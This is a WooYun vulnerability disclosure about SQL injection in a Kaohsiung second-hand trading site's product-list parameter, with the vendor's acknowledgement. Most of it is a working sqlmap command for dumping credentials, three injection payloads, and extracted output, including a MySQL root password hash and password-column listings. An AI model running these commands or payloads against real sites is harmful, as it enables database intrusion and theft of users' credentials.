当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152969

漏洞标题:高雄二手收購買賣網某處存在SQL注入漏洞(DBA權限/root密碼泄露/50多萬數據記錄泄露/3萬多名用戶密碼泄露)(臺灣地區)

相关厂商:高雄二手收購買賣網

漏洞作者: 路人甲

提交时间:2015-11-09 12:11

修复时间:2015-12-27 18:52

公开时间:2015-12-27 18:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-12: 厂商已经确认,细节仅向厂商公开
2015-11-22: 细节向核心白帽子及相关领域专家公开
2015-12-02: 细节向普通白帽子公开
2015-12-12: 细节向实习白帽子公开
2015-12-27: 细节向公众公开

简要描述:

高雄收購誠信經營專業團隊高雄各區各類房屋、土地、庫存、切貨、收購、買賣,如各類家具、家電、酒類、郵幣、珠寶、戒子、K金、黃金、雞血石、壽山石、名錶、有價字畫、禮品、禮卷、好物、名牌包包、精品、飾品、餐飲生財器具、古董、翡翠、汽車、機車、寶塔、美髮椅、五金、、、等各式有價寶物好物收藏品皆可高價到府或到指定公司,免費鑑定收購,二手全新通通都收。

详细说明:

地址:http://**.**.**.**/front/bin/ptlist.phtml?Category=8087

python sqlmap.py -u "http://**.**.**.**/front/bin/ptlist.phtml?Category=8087" -p Category --technique=BET --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


current user:    'root@localhost'
current user is DBA:    True
database management system users [5]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [2]:
    password hash: *D952E90FED3FF853919FB6117880EF6FF58C053F
    password hash: NULL


Database: ezcatdb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| word_dict                             | 388826  |
| info_dict                             | 128915  |


Database: ezcatdb
Table: sys_ctrl
[271 entries]
+--------------------------+----------------------+------------------+
| sys_cashflow1_cvs_passwd | sys_cashflow1_passwd | sys_forgetpasswd |
Database: ezcatdb
Table: usr_mstr
[918 entries]
+----------------+---------------+---------------+---------------+-----------------+
| usr_passwd     | usr_passwd2   | usr_passwd3   | usr_passwd4   | usr_resetpasswd |
Database: ezcatdb
Table: sys_ctrl_lcs
[272 entries]
+----------------+-----------------+
| sys_passwd     | sys_resetpasswd |
Database: ezcatdb
Table: cm_mstr
[33420 entries]
+----------------+----------------+
| cm_passwd      | cm_resetpasswd |
Database: itenginedb
Table: cm_mstr
[270 entries]
+-----------+
| cm_passwd |

漏洞证明:

---
Parameter: Category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Category=8087 AND 2806=2806
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Category=8087 AND (SELECT 1931 FROM(SELECT COUNT(*),CONCAT(0x71626a7671,(SELECT (ELT(1931=1931,1))),0x716a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: Category=8087 AND SLEEP(5)
---
web application technology: Apache, PHP 5.2.8
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [5]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [2]:
    password hash: *D952E90FED3FF853919FB6117880EF6FF58C053F
    password hash: NULL
Database: ezcatdb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| word_dict                             | 388826  |
| info_dict                             | 128915  |
| bbs_det                               | 91852   |
| sod_det                               | 72080   |
| rpd_det                               | 60868   |
| cgd_det                               | 34683   |
| mail_mstr                             | 34166   |
| cm_mstr                               | 33420   |
| img_mstr                              | 28647   |
| ecp_so_mstr                           | 28099   |
| pt_mstr                               | 27892   |
| pgd_det                               | 16870   |
| so_mstr                               | 15860   |
| mnd_det                               | 13866   |
| cms_det                               | 13820   |
| fld_dict                              | 12542   |
| pat_det                               | 10850   |
| pg_mstr                               | 10610   |
| form                                  | 9811    |
| sys2_ctrl                             | 8148    |
| rcgd_det                              | 7386    |
| oem_recvts_det                        | 7317    |
| cg_mstr                               | 6780    |
| cgm_det                               | 5191    |
| ecp_cs_det                            | 4418    |
| mo_mstr                               | 3679    |
| hln_det                               | 3167    |
| msg_dict                              | 2810    |
| frd_det                               | 2700    |
| img_cg_det                            | 2353    |
| fav_det                               | 1992    |
| um_mstr                               | 1782    |
| cgp_det                               | 1762    |
| prg_mstr                              | 1700    |
| text_det                              | 1560    |
| lnd_det                               | 1491    |
| lang_mstr                             | 1354    |
| frn_sessions                          | 1344    |
| rp_mstr                               | 1107    |
| icn_det                               | 1006    |
| ads_mstr                              | 997     |
| pat_asso                              | 990     |
| prv_mstr                              | 946     |
| usr_mstr                              | 918     |
| fl_self                               | 915     |
| log_hist                              | 721     |
| rcg_mstr                              | 656     |
| cart_tmp                              | 610     |
| rcgp_det                              | 598     |
| id_mstr                               | 540     |
| cod_det                               | 499     |
| bon_so_det                            | 477     |
| sz_mstr                               | 466     |
| css_mstr                              | 427     |
| foot_mstr                             | 395     |
| fr_mstr                               | 367     |
| ln_mstr                               | 301     |
| umn_file                              | 301     |
| sys_ctrl_lcs                          | 272     |
| lcs_mstr                              | 271     |
| sys_ctrl                              | 271     |
| site_tree                             | 270     |
| rcgm_det                              | 231     |
| head_mstr                             | 221     |
| req_det                               | 204     |
| skn_det                               | 183     |
| pmsg_det                              | 167     |
| hp_mstr                               | 148     |
| fls_det                               | 144     |
| cl_mstr                               | 142     |
| cgl_det                               | 131     |
| cf_det                                | 129     |
| pc_mstr                               | 119     |
| mood_mstr                             | 118     |
| vtd_det                               | 118     |
| translate_map                         | 116     |
| icon                                  | 109     |
| df_mstr                               | 97      |
| pta_det                               | 93      |
| bb_mstr                               | 86      |
| pt_det                                | 75      |
| sessions                              | 62      |
| code_mstr                             | 55      |
| oem_rld2_det                          | 55      |
| ct_mstr                               | 54      |
| rld_det                               | 37      |
| fl_mstr                               | 35      |
| ol_det                                | 33      |
| chs_mstr                              | 32      |
| cld_det                               | 30      |
| FLA_style_mstr                        | 30      |
| vt_mstr                               | 29      |
| oem_recvt_mstr                        | 26      |
| lnp_det                               | 22      |
| de_mstr                               | 20      |
| oem_fcg_mstr                          | 20      |
| pt_bon_det                            | 20      |
| oem_adsbid_mstr                       | 16      |
| area_mstr                             | 14      |
| opd_det                               | 13      |
| oem_wk_det                            | 11      |
| ftd_det                               | 10      |
| ec_stop                               | 6       |
| oem_file_det                          | 5       |
| oem_down_det                          | 3       |
| bon_cs_det                            | 2       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 841     |
| help_topic                            | 479     |
| help_keyword                          | 404     |
| help_category                         | 38      |
| `user`                                | 5       |
| db                                    | 2       |
+---------------------------------------+---------+
Database: itenginedb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| sod_det                               | 2776    |
| fld_dict                              | 1609    |
| word_dict                             | 1515    |
| records                               | 945     |
| log_hist                              | 641     |
| msg_dict                              | 414     |
| rpd_det                               | 316     |
| fls_det                               | 279     |
| prg_mstr                              | 271     |
| cm_mstr                               | 270     |
| id_mstr                               | 270     |
| lcs_det                               | 270     |
| info_dict                             | 246     |
| rf_mstr                               | 132     |
| domains                               | 131     |
| icon                                  | 109     |
| cod_det                               | 84      |
| df_mstr                               | 56      |
| chs_mstr                              | 32      |
| rp_mstr                               | 20      |
| mnd_det                               | 17      |
| vh_stop                               | 10      |
| umn_det                               | 8       |
| usr_mstr                              | 8       |
| asp_itkeylog_hist                     | 7       |
| ec_stop                               | 6       |
| lang_mstr                             | 3       |
| mod_det                               | 3       |
| pt_mstr                               | 3       |
| ag_mstr                               | 1       |
| indu_mstr                             | 1       |
| lcs_mstr                              | 1       |
| prv_mstr                              | 1       |
| sys_ctrl                              | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 5087    |
| STATISTICS                            | 921     |
| KEY_COLUMN_USAGE                      | 532     |
| TABLES                                | 357     |
| TABLE_CONSTRAINTS                     | 324     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 85      |
| COLLATIONS                            | 85      |
| USER_PRIVILEGES                       | 77      |
| SCHEMA_PRIVILEGES                     | 28      |
| CHARACTER_SETS                        | 26      |
| SCHEMATA                              | 6       |
+---------------------------------------+---------+
Database: twe
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| layout_boxes                          | 364     |
| configuration                         | 284     |
| zones                                 | 90      |
| phpbb_config                          | 62      |
| phpbb_smilies                         | 42      |
| banners_history                       | 18      |
| configuration_group                   | 16      |
| phpbb_search_wordmatch                | 13      |
| content_manager                       | 12      |
| phpbb_search_wordlist                 | 12      |
| sessions                              | 7       |
| customers_status                      | 6       |
| orders_status                         | 6       |
| shipping_status                       | 6       |
| address_format                        | 3       |
| address_book                          | 2       |
| admin_access                          | 2       |
| categories_description                | 2       |
| cm_file_flags                         | 2       |
| countries                             | 2       |
| currencies                            | 2       |
| customers                             | 2       |
| customers_info                        | 2       |
| languages                             | 2       |
| news_categories_description           | 2       |
| news_products_description             | 2       |
| phpbb_groups                          | 2       |
| phpbb_user_group                      | 2       |
| banners                               | 1       |
| categories                            | 1       |
| layout_template                       | 1       |
| news_categories                       | 1       |
| news_products                         | 1       |
| news_products_to_categories           | 1       |
| phpbb_categories                      | 1       |
| phpbb_forums                          | 1       |
| phpbb_posts                           | 1       |
| phpbb_posts_text                      | 1       |
| phpbb_ranks                           | 1       |
| phpbb_themes                          | 1       |
| phpbb_themes_name                     | 1       |
| phpbb_topics                          | 1       |
| whos_online                           | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ezcatdb
Table: sys_ctrl
[3 columns]
+--------------------------+-------------+
| Column                   | Type        |
+--------------------------+-------------+
| sys_cashflow1_cvs_passwd | varchar(50) |
| sys_cashflow1_passwd     | varchar(50) |
| sys_forgetpasswd         | tinyint(4)  |
+--------------------------+-------------+
Database: ezcatdb
Table: ICQ_opr_mstr
[1 column]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| ICQ_opr_passwd | varchar(20) |
+----------------+-------------+
Database: ezcatdb
Table: usr_mstr
[5 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| usr_passwd      | varchar(16) |
| usr_passwd2     | varchar(16) |
| usr_passwd3     | varchar(16) |
| usr_passwd4     | varchar(16) |
| usr_resetpasswd | varchar(16) |
+-----------------+-------------+
Database: ezcatdb
Table: cm_mstr
[2 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| cm_passwd      | varchar(16) |
| cm_resetpasswd | varchar(16) |
+----------------+-------------+
Database: ezcatdb
Table: sys_ctrl_lcs
[2 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| sys_passwd      | varchar(16) |
| sys_resetpasswd | varchar(16) |
+-----------------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: itenginedb
Table: sys_ctrl_lcs
[2 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| sys_passwd      | varchar(16) |
| sys_resetpasswd | varchar(16) |
+-----------------+-------------+
Database: itenginedb
Table: admin
[5 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| admin_passwd      | varchar(50) |
| admin_passwd2     | varchar(50) |
| admin_passwd3     | varchar(50) |
| admin_passwd4     | varchar(50) |
| admin_resetpasswd | varchar(50) |
+-------------------+-------------+
Database: itenginedb
Table: mailbox
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: itenginedb
Table: usr_mstr
[5 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| usr_passwd      | varchar(16) |
| usr_passwd2     | varchar(16) |
| usr_passwd3     | varchar(16) |
| usr_passwd4     | varchar(16) |
| usr_resetpasswd | varchar(16) |
+-----------------+-------------+
Database: itenginedb
Table: cm_mstr
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| cm_passwd | varchar(30) |
+-----------+-------------+
Database: itenginedb
Table: cm_mass
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| cm_passwd | varchar(30) |
+-----------+-------------+
Database: itenginedb
Table: cm_mstr_hist
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| cm_passwd | varchar(30) |
+-----------+-------------+
Database: itenginedb
Table: ag_mstr
[2 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| ag_passwd      | varchar(100) |
| ag_resetpasswd | varchar(100) |
+----------------+--------------+
Database: twe
Table: customers
[2 columns]
+--------------------+-------------+
| Column             | Type        |
+--------------------+-------------+
| customers_password | varchar(40) |
| user_newpasswd     | varchar(32) |
+--------------------+-------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-11-12 18:50

厂商回复:

感謝通報

最新状态:

2016-01-07:HITCON 於接獲通報後曾二次 email 該網站所示之服務信箱,但至漏洞公開時仍無回應。

漏洞评价:

评价